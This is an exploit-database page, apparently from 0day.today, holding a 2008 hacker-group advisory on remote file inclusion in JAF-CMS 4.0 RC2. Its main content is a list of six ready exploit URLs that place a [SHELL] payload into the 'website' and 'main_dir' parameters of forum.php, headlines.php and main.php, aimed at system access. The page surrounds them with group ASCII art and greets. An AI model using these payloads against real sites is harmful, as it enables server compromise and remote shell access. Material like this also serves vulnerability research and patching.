[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

JAF-CMS 4.0 RC2 Multiple Remote File Inclusion Vulnerabilities

Author
CraCkEr
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2782
Category
web applications
Date add
26-03-2008
Platform
unsorted
==============================================================
JAF-CMS 4.0 RC2 Multiple Remote File Inclusion Vulnerabilities
==============================================================



?-----------------------------------------------------------------------------¬
¦¦                             C r a C k E r                                --
--          T H E   C R A C K   O F   E T E R N A L   M I G H T             ¦¦
L-----------------------------------------------------------------------------

 -----      From The Ashes and Dust Rises An Unimaginable crack....      ----¬
-----------------------------------------------------------------------------¬
--                         [ Remote File Include ]                          --
L-----------------------------------------------------------------------------
:   Author   : CraCkEr                : :                                    :
¦   Group    : PitBull Crew           ¦ ¦                                    ¦
¦   Script   : JAF-CMS 4.0 RC2        ¦ ¦         Register Globals :         ¦
¦   Download : SourceForge.net        ¦ ¦                                    ¦
¦   Method   : GET                    ¦ ¦          [-] ON   [ ] OFF          ¦
¦   Critical : High [--------]        ¦ ¦                                    ¦
¦   Impact   : System access          ¦ ¦                                    ¦
¦ ------------------------------------- L----------------------------------- ¦
¦                              DALnet #crackers                             --
L-----------------------------------------------------------------------------
:                                                                            :
¦  Release Notes:                                                            ¦
¦  =============                                                             ¦
¦  Typically used for remotely exploitable vulnerabilities that can lead to  ¦
¦  system compromise.                                                        ¦
¦                                                                            ¦

-----------------------------------------------------------------------------¬
--                             Exploit URL's                                --
L-----------------------------------------------------------------------------
  
        http://localhost/path/module/forum/forum.php?website=[SHELL]         
        http://localhost/path/module/forum/forum.php?main_dir=[SHELL] 
        http://localhost/path/module/forum/headlines.php?website=[SHELL]
        http://localhost/path/module/forum/headlines.php?main_dir=[SHELL]
        http://localhost/path/module/forum/main.php?website=[SHELL]
        http://localhost/path/module/forum/main.php?main_dir=[SHELL]
   
L-----------------------------------------------------------------------------
 
Greets:
       The_PitBull, Raz0r, iNs, WizzKidd, Sad, S|AyER, Ehab, Tfaces, Guzman,
       Karlousha, Od3d99aa. Mark, Ramzi, Lust, DeaD, adal, xD

-----------------------------------------------------------------------------¬
--                              © CraCkEr 2008                              --
L-----------------------------------------------------------------------------



#  0day.today [2024-12-24]  #